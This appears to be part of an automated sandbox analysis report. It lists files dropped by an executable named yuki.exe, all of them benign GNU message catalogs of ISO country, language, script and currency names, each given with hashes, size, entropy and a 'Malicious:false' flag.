                                                                                                    SHA-512:99315E8624F000FB1842D321A9322AA072EA131C12148853F07261BE126F79FE352C52350F077F768BAB42FBADC2FFD67A0EC34EADA0BDDAEE8748B1353740F8
                                                                                                    Malicious:false
                                                                                                    Preview:........................\...............................................................................................................%.......,.......8.......D.......P.......V.......e.......s.......K.......T.......\.......a.......j.......q.......|........................................................................................................................................................................................................................Belarus.Canada.China.Denmark.France.Germany.Greece.India.Ireland.Israel.Italy.Japan.Mexico.Netherlands.New Zealand.Philippines.Spain.United Kingdom.United States.Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-25 21:47+0000.Last-Translator: Chris Leonard <cjlhomeaddress@gmail.com>.Language-Team: Hawaiian <https://hosted.weblate.org/projects/iso-codes/iso-3166-1/haw/>.Language: haw.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Conte
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):395
                                                                                                    Entropy (8bit):5.2089211953991335
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijkYYxA9Ct0vOuvP0NXzffUWKcG/R1iMA2KMiRlF2AF15jXmBQ8KMW0YEi9:i4kxxjt02UkLKcG/Ki4FL1JXmBQWi9
                                                                                                    MD5:3E376888E8F4F58FBC8697AE9C7141D8
                                                                                                    SHA1:45A9EFEA68629B92D4F105910789C63AF63260B4
                                                                                                    SHA-256:1CAD6C0EC1225CD03F34AE97A94B5728D45F3FE75FC23631F561D41CA2C123A0
                                                                                                    SHA-512:6AA5AFEC85EA7BC4D74C8A80341178D8C28D2B2A14BB7FE4198B193B919A6771BC399B6EED148D846DCA9600BA8A29A6BE0D8FBC731BC11F538B6D7C2B012CD4
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...Q...9................Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-08-08 10:00+0100.Last-Translator: Alastair McKinstry <mckinstry@debian.org>.Language-Team: Hawaiian.Language: haw.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 58 messages, Project-Id-Version: iso_15924 '\327\220\327\223\327\234\327\235'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3410
                                                                                                    Entropy (8bit):5.105418408536275
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:jqP3Is5KGAJgu0CqWcosRlw1Hgx1OqYF717Sqs:jqP4wKGyUCqWzszpx1OtF9bs
                                                                                                    MD5:444DA0855268F8DA228805F3EFA6EA98
                                                                                                    SHA1:CD5142705F8BD9F452109997DDAD94F2EC5DCDB0
                                                                                                    SHA-256:FF7365933AF42E22C32A47B44F40AC5DB82CF71E4DD1E24E42C72A6D81F7DC6F
                                                                                                    SHA-512:C7A71F31C3496DEC7E22E682CE264C95CB2F9ECDDBF192949BED9194A33E678E30850D58649F1E5380920E89305EA7B96079A18505227CDE09092539ECB21FF5
                                                                                                    Malicious:false
                                                                                                    Preview:........:...........O...................................................&......./.......7.......@.......H.......Q.......X.......`.......s.......|...............................................................................................!.......(......./.......8.......I.......R.......Z.......`.......t.......x.......~...............................................................................................................1.......7.......>.......E.......J.......R.......[......._.......n.......x...................&...................................................................!.......=...)...L...'...v...............................................................................(.......B.......O.......Z.......k.......................................................................................3.......>.......G.......T.......j.......y...........(...............-...................................................&.......7.......>...............!...(...........%...9...$.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: he '\327\220\327\244\327\222\327\240\327\231\327\241\327\230\327\237'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):27802
                                                                                                    Entropy (8bit):5.022416936526857
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:0oObyD48fmsWP48WAI2SM6sE6Ipv03XpY2:bq+48LuDICY2
                                                                                                    MD5:8E82A2B5AD2088552D2330C468AAC40F
                                                                                                    SHA1:8068965BA8F11DEBAF68A895B3B8253910E0E5C8
                                                                                                    SHA-256:E6FEBF3584B5AB7B3947DFA3B280FF5550A24691409FC0AF00BFC520A71CA0AF
                                                                                                    SHA-512:5C07174EF8DFEA284724858A1A3FB95C212B90F1706292760768C558A74AB15C67E1A8B5882351FAD084AE2A2E614696F64934A606B91B6E3DDDBA74171A77EA
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 908 messages, Project-Id-Version: iso_3166-2 '\327\220\327\263\327\220\327\240\327\224'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):43708
                                                                                                    Entropy (8bit):4.99163637231343
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:0imLyOC/8mXBWGgd0dh36NhKCGeA9zqrCz1hP17+fsEDSObcRZ:rmLyH0s36NhKCqQCr9qBncz
                                                                                                    MD5:EEECB76C78F32B4414B5FA0337AB8736
                                                                                                    SHA1:7ED6A8065AA611462F9776A6BDC4584996626811
                                                                                                    SHA-256:7739B4BF73675D279CB967B1C77A16D7E3CA8362D79C9320C1A5A67EA93124F9
                                                                                                    SHA-512:CFB5243DEB67584B49D267A696A5E7C92599EC5E2137F85C595E1C6E20E357E0DA3D62967CA1F787E21BFC2E54EA05189B81EFFC526C0A0732379524EDC80896
                                                                                                    Malicious:false
                                                                                                    Preview:................|........8.......K.......K.......K.......K.......K.......K.......L.......L.......L......$L......2L......8L......BL......QL......]L......hL......tL.......L.......L.......L.......L.......L.......L.......L.......L.......L.......M.......M.......M......#M......-M......7M......?M......IM......VM......`M......oM......}M.......M.......M.......M.......M.......M.......M.......M.......M.......M.......N.......N.......N.......N......%N......)N......8N......AN......]N......eN......vN.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......O.......O.......O...... O.......O......?O......NO......\O......rO......yO.......O.......O.......O.......O.......O.......O.......O.......O.......O.......O.......P.......P.......P.......P......(P......3P......9P......FP......NP......VP......_P......jP......qP......yP.......P.......P.......P.......P.......P.......P.......P.......P.......P.......P.......P.......P.......P.......P.......P......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: he '\327\224\327\230\327\250\327\231\327\230\327\225\327\250\327\231\327\224 \327\224\327\221\327\250\327\231\327\230\327\231\327\252 \327\221\327\220\327\240\327\230\327\250\327\247\327\230\327\231\327\247\327\224'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3369
                                                                                                    Entropy (8bit):5.281944887983712
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3WsSaGI+vGqIfdvqN5CRUs8wtLHgixsMS2CdzgxpByObgYR6S:rLvWsSaN+yaCRwG3ST2CdzgxpBtp1
                                                                                                    MD5:D646DEEDD2E9C977EF19143037EDFBAE
                                                                                                    SHA1:9742619212D76CB800EB2E283F18293163DF37B9
                                                                                                    SHA-256:17E3923E98FB9E2B63168F26247AC93FAD4A6774093D8CA5BAC0A969DF3F7BF8
                                                                                                    SHA-512:9E0A19F057F735F57E72750E42C7BCD20114FA1BD26A186CB46313FC8CDCB26646CC720A551C73E83F1C39F30D62B9212FF861BA412E0913DA2040F00893ACD2
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................6.......N...(...l...w...(.......Z...........h.......u...................).......H.......4...2..."...g...........................................1...........=.......X.......v...........>...............0.......:...%.......`...@...p...U.......!............... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 122 messages, Project-Id-Version: iso_639-3 '\327\220\327\221\327\227\327\226\327\231\327\252'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5910
                                                                                                    Entropy (8bit):4.802454858969696
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:oVwnznBk621rAcSwsRVCaxFAP4ka0lDV1AMvF+l2CnINlqB3n3pNR6tVmLs7lb:8KnBBOjSCKAPXl51NvYcAtn3pNRCELWb
                                                                                                    MD5:6F9390BC5AF9841DD76CDB00C2597BB8
                                                                                                    SHA1:0D44DE490A66BCD909A6008E587440FD73A9F1A3
                                                                                                    SHA-256:36E0893886BE16A27F150B83599FDAB8586ED3AB123A1598B1AE4EBABDC1FF91
                                                                                                    SHA-512:68B758F933095F89961655345F8DC0D7B42EADCD7970C212D2E0B27BFB0F74595E9EE2AFB922F850CC1F5A9C67EBA391AE11EC8913D05760A7B5859E3A49B507
                                                                                                    Malicious:false
                                                                                                    Preview:........z.......................H.......I.......S.......X.......b.......j.......r...............................................................................................................................................................$.......-.......6.......<.......C.......L.......R.......b.......g.......q.......z...............................................................................................................................................................(.......5.......C.......J.......R.......Y.......^.......d.......l.......w...............................................................................................................................................................$.......+.......6.......?.......G.......O.......W.......^.......h.......p.......x.......~...............................................................................................................................................................-.......3.......9.......A.......H.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 421 messages, Project-Id-Version: iso_3166-1 '\340\244\205\340\244\253\340\244\274\340\245\215\340\244\227\340\244\276\340\244\250\340\244\277\340\244\270\340\245\215\340\244\244\340\244\276\340\244\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):35310
                                                                                                    Entropy (8bit):5.008835815622387
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:snboRT6k+bRgbL2nFyzmwZbjh5wsWP4XWAIziUGHsBGFPpY7897x78cuAppHrBkd:sxDnFyzmotmsWP4XWAIDBkpBdPH7y
                                                                                                    MD5:1B5213EDEE105DD96104FED7C5B53702
                                                                                                    SHA1:3EC923AF7CFE5DEA5C9FF31B23ECBADB3F0EE552
                                                                                                    SHA-256:43DE40CA598C7C0349006BF4761A2F72CD2BEA5C635AC8508686B423FB78C44F
                                                                                                    SHA-512:80F67D44DAAC7CB849FC60DC1A2CA4DE79A1B279BB4B72842281D7EEF31B1C20A8C6A3523C0D8C8DC2070D38112BC9B2A9F26BAB467DFE96769157C2EA22D592
                                                                                                    Malicious:false
                                                                                                    Preview:................D...3...l.......8#......9#......E#......M#......U#......d#......l#......s#......|#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......&$.......$......5$......;$......C$.. ...J$......k$......s$.. ....$.......$.......$.......$.......$.......$.......%.......%......1%......:%......G%......O%......Z%......c%......l%......s%.......%.......%.......%.......%.......%.......%.......%.......%.......%..,....&......@&......H&..%...N&......t&.......&.......&.......&.......&.......&.......&.......&.......&..%....&..,....&.."..."'..*...E'......p'......x'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(......#(..'...1(..$...Y(......~(.......(.......(.......(.......(.......).......).......)......#)......1)......B)......R)......n)......t).......).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\244\254\340\245\215\340\244\260\340\244\277\340\244\237\340\244\277\340\244\266 \340\244\217\340\244\243\340\245\215\340\244\237\340\244\276\340\244\260\340\245\215\340\244\225\340\244\237\340\244\277\340\244\225 \340\244\237\340\245\207\340\244\260\340\245\200\340\244\237\340\244\260\340\245\200'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3973
                                                                                                    Entropy (8bit):5.228120110262127
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADHlByvGqIfdvqNuoUzpW/mub7l2kxL8fzIO1dgJxkbSHl8nPT:qDyyBo2WLB9xL8b964eHl8nPT
                                                                                                    MD5:C03461094B65C1D4DDD191E17C4B1E44
                                                                                                    SHA1:8F53CBBAFA9188A8C9A24CEED1678A24EA437782
                                                                                                    SHA-256:A457757001F2456CF0929FD0860492880573EE9FC2460BC2CDBADC25B8CCF34E
                                                                                                    SHA-512:5355801EC2A02F6E2DA9D387A607465511F173AF367B1B3EF58D5CB3761879DC418EF4BB5ABEA23E56ADCA1D9E94CB97028DF41CB931B4B0020836A042B40D75
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................M...|...m.......|...8...K......................./...............8.......B.......p...`...J.......N.......(...k...(.......7.......%.......(...........D.../...s...Q...............(.......W...4...q.......C.......[...B...&...............9...K........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 123 messages, Project-Id-Version: iso_639-3 '\340\244\205\340\244\254\340\245\215\340\244\226\340\244\276\340\245\233\340\244\277\340\244\257\340\244\250\340\245\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6805
                                                                                                    Entropy (8bit):4.89846768619138
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:W5s4/ydltswrAT80l3D3bpte5M5+9IRf3cSCtl3MFxiXmyS+e1:W59Kdlur80lT3/eqG3Mi1e1
                                                                                                    MD5:3E5F21DE1BFEDD6F802F37151D6D7A9C
                                                                                                    SHA1:052D55FD2C1AC1771126F9EB2AA4B3FF16527353
                                                                                                    SHA-256:96E316DBEE8FA77B13BC1F5BB8E077E140C8D7959987484280F7DC6D9D7EC017
                                                                                                    SHA-512:0BFCD5C3B0EC1D886688F17F403306C36D56144418D2C67CCD253C4ED6AC5E1FA85E3505A72FB938637445811CEBD3153B8075394783F8C4333B30E42ED0C16A
                                                                                                    Malicious:false
                                                                                                    Preview:........{.......................h.......i.......s.......x...............................................................................................................................................................".......+.......4.......:.......A.......G.......P.......X.......b.......k.......s.......z...............................................................................................................................................................!.......).......2.......9.......E.......M.......T.......\.......`.......f.......n.......v............................................................................................................................................................... .......&......./.......7.......=.......D.......K.......U.......\.......l.......v.......|.......................................................................................................................................................................!.......'.......-.......3.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_639-5 '\340\244\221\340\244\270\340\245\215\340\244\237\340\245\215\340\244\260\340\245\213-\340\244\217\340\244\266\340\244\277\340\244\257\340\244\276\340\244\210 \340\244\255\340\244\276\340\244\267\340\244\276\340\244\217\340\244\202'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):632
                                                                                                    Entropy (8bit):5.501823752498222
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iLsl/S119Xxq8t02UkIV/M8nPLLG/4l5ZiXmBQWiOWYJ:ZuXTt0UmMp/FXmGU
                                                                                                    MD5:AF1BFADB62A52DD5AE3772943D5D4EF2
                                                                                                    SHA1:7DD3A62FE92C319BF5C0780B3FF575A53E1D28C4
                                                                                                    SHA-256:4535072887318484B2A890AA19F532B1F41ADA6DA7218C26900FDCECF7370DF3
                                                                                                    SHA-512:82698EA49C2A099DE6DC80531C3B505515BB92903D51646235B91336693410527142E6C930AAC06676F069C4FB68187E79675C14B52CC17424650EFF2DE2B29A
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q.......j...;...<........................Austro-Asiatic languages.Project-Id-Version: iso_639-5.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2021-11-12 17:51+0000.Last-Translator: KushagraKarira <kushagrakarira@gmail.com>.Language-Team: Hindi <https://hosted.weblate.org/projects/iso-codes/iso-639-5/hi/>.Language: hi.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n > 1;.X-Generator: Weblate 4.9.1-dev.........-...... .......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlamsko'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10432
                                                                                                    Entropy (8bit):5.117643600523515
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:d28MebbltU4WjV9qWxa5hW85zWCUHLtuhu62:mebbg4WjVDxa5hW85zWxhuhup
                                                                                                    MD5:89E9D86BD3CFA0C0981B6C844C8DA87C
                                                                                                    SHA1:F18B7FC6635E2DDEFAAE6BD857B44967CD1C50C9
                                                                                                    SHA-256:BEE1CEE5651C612B2CFB9DEA6B83EEE31B9128CB328599C86C0B5BBA51345F64
                                                                                                    SHA-512:2DCFC64404D8DEF2B55E4E53E4D300B0A0561D4834BC1DFB16D87273367AE90F4BF2613C64238BFA4777FC32DE7879E5AD99B6FE6999E09597B4316561D01AE5
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 423 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23488
                                                                                                    Entropy (8bit):5.050246294829439
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:taDYOckDRul+cYRmMvXMMDpQqYbEbjh5wsWP4XWAINiVGBOzjfqLENmQwjcQjXk7:naDcYBvXMspMbgtmsWP4XWAIjwiLqGQL
                                                                                                    MD5:91393E120BCFEFD2180FD86233CDDC3F
                                                                                                    SHA1:65217A85EEB36398E1D5F719A237AE9F13A206A3
                                                                                                    SHA-256:45D85E9BC1E758AB091397AF1DCC5A8D9D3F35D5572215DE71167ABE52F07B74
                                                                                                    SHA-512:AC84A787F8801A11E158D55C34CA3F080E006F70F37FFD128A0CBAD6E1108ACB3E57A4AFBF482759C32893C55A03689F87A3C2ED01D9519E25CF99B373E02381
                                                                                                    Malicious:false
                                                                                                    Preview:................T...9...........p#......q#......}#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......'$......2$......:$......B$......M$......V$......^$......f$......m$......s$......{$.. ....$.......$.......$.. ....$.......$.......%.......%.......%......!%......@%......W%......i%......r%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&....../&..,...K&......x&.......&..%....&.......&.......&.......&.......&.......&.......&.......&.......&.......&..%....'..,...-'.."...Z'..*...}'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(......%(......-(......6(......?(......[(..'...i(..$....(.......(.......(.......(.......)......))......G)......L)......T)......[)......i)......z).......).......).......).......).......).......).......).......).......).......).......*.......*.......*......#*......(*......2*......;*......B*......P*......W*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 538 messages, Project-Id-Version: iso_3166-2 'Teritorij glavnog grada Abuja'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25948
                                                                                                    Entropy (8bit):5.022028067098029
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:kVt/3I0R3SBKFGFqOap9JymQ+Uay8ud28tLBblpIWZDnvu5zhku9S2joELpCVpBJ:23XR3FGFqXhuVtVbfIWpWht9lDVWpBJ
                                                                                                    MD5:355B683684BA77DF7E75353C6FAE8DE6
                                                                                                    SHA1:99A7EF3BE3147B5E78ABA7B5CE2C9BAC9BDB8ED5
                                                                                                    SHA-256:7887E9EB3EE7AEDFEF75289F974AF021CEC20548490875768B0339C8D32E7983
                                                                                                    SHA-512:087A06A8F673C15243C030E396D0AC48AAE9BCC0CD20500A6740EDFE19E7E12624F539FDEE39C22FD96F5F4D6EB194EBF6CE1BC5A8F2A5A290C8942E4F88274C
                                                                                                    Malicious:false
                                                                                                    Preview:.........................!.......,.......,.......-......&-......2-......A-......M-......e-......o-......v-.......-.......-..$....-.......-.......-.......-.......-......................$.......(.......=.......Z.......a.......h.......q.......z................................................... ............................................/......./......./......"/......,/......9/......B/......H/......W/......c/......v/......./......./......./......./......./......./......./......./......./......./......./......./.......0.......0.......0......'0....../0......H0......N0......[0......j0.......0.......0.......0.......0.......0.......0.......0.......0.......0.......0.......0.......0.......1.......1......%1.......1......61......?1......E1......P1......W1......m1......t1.......1.......1.......1.......1.......1.......1..!....1.......1.......1.......2.......2.......2....../2......<2......N2......Z2......m2......u2......}2.......2.......2.......2.......2.......2.......2.......2.......2.......2......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Britanski Antarkti\304\215ki Teritorij'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2755
                                                                                                    Entropy (8bit):5.29565920708035
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADKgJnkvGqIfdvqNuoU2YrJD7nqoOoaLAXCGFyZyoMoB:qDRJkyBo1Yrtq0EAXfJ7S
                                                                                                    MD5:7D365E25B00BDE0806347017DA8ADCA2
                                                                                                    SHA1:EAC8A50A77EF34C0CD0EE934BCF76CEB390321C3
                                                                                                    SHA-256:5FE44DBF0BA33E83718E6E724634C20D61988A4BE03CF5BFDECA16C373C045A3
                                                                                                    SHA-512:1B72CA8DED814C98BEA47ADA44653B0601CC879A63D2BE8EAE574FE5185F8A408871355E2904CB055CB5D88D5FC9F4241E910B22C9C687A9E3377AFF7D975730
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c................... .......%.......2...........6...8...O...........................................*...................-.......D.......R.......a.......s...........)....................................... .......1...........L.......c...........1....................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'ADB obra\304\215unska jedinica'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10437
                                                                                                    Entropy (8bit):5.035242680879582
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFwUnQZpZDCNpZ6VRyK0G/2LCntxpt++tNb+Xr5uOnh1i1TwNgkcZQ:SDQZpZ2NpZ6TL0G/Uo/ptRSr5x1mwekr
                                                                                                    MD5:EA8B4739CD3984ADD8CA6C0B3D898B94
                                                                                                    SHA1:667EF33AD9237709F689D18573082328CA0160FF
                                                                                                    SHA-256:2CA926A1DBE5A7F753A3DDE6342B0BFDF349FDA58C4AB6E428409ED9EA3BAAEF
                                                                                                    SHA-512:69549DF0E5C5FF8D33396C73E4FAB6F48CA103F19AE776A7ED74C53D3A2CDE692178E784511FA4D3F6A71C611260AD162FFB648A21DBD347460DF3E1B2445C93
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 938 messages, Project-Id-Version: iso_639-3 'Aas\303\241x'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):52545
                                                                                                    Entropy (8bit):5.175947386596788
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:ugBu8Lv4bAPjsBt/E4yOMgv5Zp4pHkZcHabN0OkSnRFdqm5vu/IiPed:umWaLwkk2HON0OtJqUnVd
                                                                                                    MD5:87C6BC9E741E01C821F8F6D5561CF6A1
                                                                                                    SHA1:AD2FD48C1D0FC50D10B611A1225D43DCBAB2D6BD
                                                                                                    SHA-256:42D02B1329FB01D2B09B27BA568368D3E74745C42EA146AAC5A92A1AA02B6A7A
                                                                                                    SHA-512:04E8CF13E60FC0EF664554D82A82FBCD300F4BD2EBC6762110A47A688F4EFB15E8C16E192BA44380271EE9DB95E41ABB24E4694BDF1A9635BB4201A0F3A6D615
                                                                                                    Malicious:false
                                                                                                    Preview:................l........:......hN......iN......pN......vN.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......N.......O.......O......+O......2O......8O......=O......RO......\O......qO......~O.......O.......O.......O.......O.......O.......O.......O.......O.......O.......P.......P.......P......3P......JP......_P......iP......nP......}P.......P.......P.......P.......P.......P.......P.......P.......P.......P.......Q.......Q.......Q......)Q......@Q......HQ......PQ......hQ......wQ.......Q.......Q.......Q.......Q.......Q.."....Q.......Q.......R.......R.......R......,R......ER......XR......hR......xR.......R.......R.......R.......R.......R.......R.......R.......S...... S......5S......DS......YS......jS......xS.......S.......S.......S.......S.......S.......S.......T.......T......'T......6T......GT......VT..,...`T.......T.......T.......T.......T.......T.......U.......U......'U......<U......BU......ZU......^U......oU......xU......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Afroazijski jezici'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7671
                                                                                                    Entropy (8bit):4.954004119420387
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4SDx4+ENedRSE0BfNcaT4Pg0uHFGiDlJMSI3ep3yzY0vLy45k5TpB3v1R51cSaUC:XK+FdME0BfNcaTCg0uHFqSI3ep3yzY0z
                                                                                                    MD5:72B9E60644F43A48CE142A0347E0C00A
                                                                                                    SHA1:F26A0144DBBF5A3AA7970B6136BA1CF33E9B6123
                                                                                                    SHA-256:7B81E2819A22C9B447028094D16E5FBC8130705C1795CE929221CC50351FB6E0
                                                                                                    SHA-512:F90E0AD9ECFDC4C70FF59465FE145F6079A034CF34B28079FCC077C391CBFFD2968665DFC3A0E8D92C6ECF8D0DC2D98F9BC638925D955177BA12938809752704
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...........................................%.......8.......M.......].......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 187 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7744
                                                                                                    Entropy (8bit):4.682024336309442
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:8qds6EECa88ygwgJAor7Jaz+BWTTmcjucHFyBagP6uf2C:8bRonyyJbJazWqTmc6QFy8gP6uf
                                                                                                    MD5:F574AFFBCABDDC89F2EED5E52D2FFF4F
                                                                                                    SHA1:AD33565149D85672E29BF742FF2C4027BF51E2D3
                                                                                                    SHA-256:CC7FBA3E7B5A7CF08E11CE6E5F470CAAAF0EC816E63820999B018FCECAD23EBC
                                                                                                    SHA-512:0E302A04199BBD13A8E33E1EEB2A37CFA31DC9BAA70B962424E1528D8B9F90579EFCCD0BBD995E4389A65512AC5E561DF68DAA2037FD0E14067345F65C6B9631
                                                                                                    Malicious:false
